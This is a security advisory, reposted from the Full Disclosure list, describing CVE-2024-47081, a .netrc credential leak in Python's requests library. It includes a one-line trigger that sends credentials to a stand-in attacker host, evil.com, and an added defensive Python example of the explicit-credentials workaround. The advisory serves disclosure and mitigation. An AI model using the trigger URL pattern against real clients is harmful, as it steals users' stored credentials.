CVE-2024-47081: Netrc credential leak in PSF requests library
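The Python Software Foundation (PSF) requests library has a security vulnerability, CVE-2024-47081, which leaks the user's .netrc credentials to third-party sites when handling certain URLs. The issue stems from a URL parsing error and has not yet been fixed. 2025-6-3 13:0:20 Author: seclists.org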


Full Disclosure mailing list archives


From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc 
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

  requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. 
CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
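
An added example (not part of the original post and not code from the requests project) of the workaround described above: it resolves .netrc credentials by the URL's real destination host using Python's standard `netrc` module, so they can be passed explicitly as `auth=`. `prefix_key` is an assumed model of the flawed host derivation, and the netrc entry is constructed sample data.

```python
import netrc
import os
import tempfile
from urllib.parse import urlsplit

# Constructed sample entry; host and credentials are placeholders.
SAMPLE_NETRC = "machine example.com login alice password constructed-secret\n"


def prefix_key(url):
    """Assumed model of the flawed lookup key: netloc cut at the first ':'.

    Any userinfo before '@' is mistaken for the host."""
    return urlsplit(url).netloc.split(":")[0]


def connect_host(url):
    """Host the client actually connects to (userinfo and port removed)."""
    return (urlsplit(url).hostname or "").lower()


def explicit_auth(url, netrc_path):
    """Return (login, password) for the real destination host, or None.

    URLs carrying userinfo are refused outright."""
    if "@" in urlsplit(url).netloc:
        raise ValueError("userinfo in URL; refusing netrc lookup")
    entry = netrc.netrc(netrc_path).authenticators(connect_host(url))
    return (entry[0], entry[2]) if entry else None


def load_sample():
    """Write the constructed netrc to a private temp file; return its path."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_NETRC)
    return path


if __name__ == "__main__":
    path = load_sample()
    trigger = "http://example.com:@evil.com/"  # URL from the advisory
    print(prefix_key(trigger), "!=", connect_host(trigger))
    print(explicit_auth("http://example.com:8080/api", path))
    os.unlink(path)
```

The tuple returned by `explicit_auth` is meant to be supplied as the `auth=` argument of the request call, which is the explicit-credentials workaround the advisory names.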



Source: https://seclists.org/fulldisclosure/2025/Jun/2